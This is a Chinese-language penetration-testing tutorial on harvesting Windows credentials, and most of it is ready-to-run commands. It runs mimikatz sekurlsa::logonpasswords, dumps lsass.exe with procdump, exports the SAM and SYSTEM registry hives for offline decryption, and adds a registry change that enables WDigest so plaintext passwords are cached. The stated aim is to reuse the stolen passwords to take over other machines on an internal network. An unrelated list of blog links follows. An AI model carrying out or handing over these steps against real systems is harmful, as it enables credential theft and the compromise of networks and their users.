windows密码获取
概述
渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。
windows密码获取方法
最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。
使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。
mimikatz直接获取
直接将mimikatz 上传到目标服务器,执行相关命令。
命令
privilege::debug //提升至debug权限
sekurlsa::logonpasswords //抓取密码
procdump + mimikatz
命令
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
下载到本地,mimikatz执行
sekurlsa::minidump
sekurlsa::logonpasswords full
注册表获取密码
reg save hklm\sam sam.hiv
reg save hklm\system sys.hiv
mimikatz 解密
lsadump::sam /system:sys.hiv /sam:sam.hiv
然后使用在线网站进行破解
https://www.objectif-securite.ch/
这里其实就是将sam 文件通过导出文件,然后解析。
mimikatz 直接获取sam 文件内的hash。
log res.txt
privilege::debug
token::elevate
lsadump::sam
注意事项
当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
reg add hklm\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
参考
https://www.objectif-securite.ch/ophcrack
https://blog.csdn/Adminxe/article/details/105926959
https://blog.csdn/w1590191166/article/details/107350200
https://cloud.tencent/developer/article/1684021
https://zhuanlan.zhihu/p/58875844
https://times0ng.github.io/2018/04/20/Windows%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96%E6%80%BB%E7%BB%93/
https://www.secrss/articles/24903
https://www.jianshu/p/801ef84321ab
https://gitbook/gitchat/column/5afbf24f753289354cab7983/topic/5afbf818753289354cab7e3c
- 浪潮存储与虚拟服务器连接失败,浪潮
- Java 接口+继承
- java interface接口和多继承
- 亲测Linux服务器安装JKD操作流程
- 如何用Matlab实现自适应滤波器!!!
- 创建html自定义标签,如何为htm创建自定义标签
- flask
- 【基础】BMP格式
- 港湾公园 Haven Park for Mac(好玩的探索建造冒险游戏)
- emgu 配置
- 购买二手MacBook是否正品,请仔细检查以下情况,可防止翻车
- 1142:单词的长度c语言解法
- PTA刷题技巧
- Java数据可视化 (JavaFX, Apache ECharts)
- web中gzip,deflate的压缩与解压
- 结构体数组与结构体指针
- javascript中call的用法总结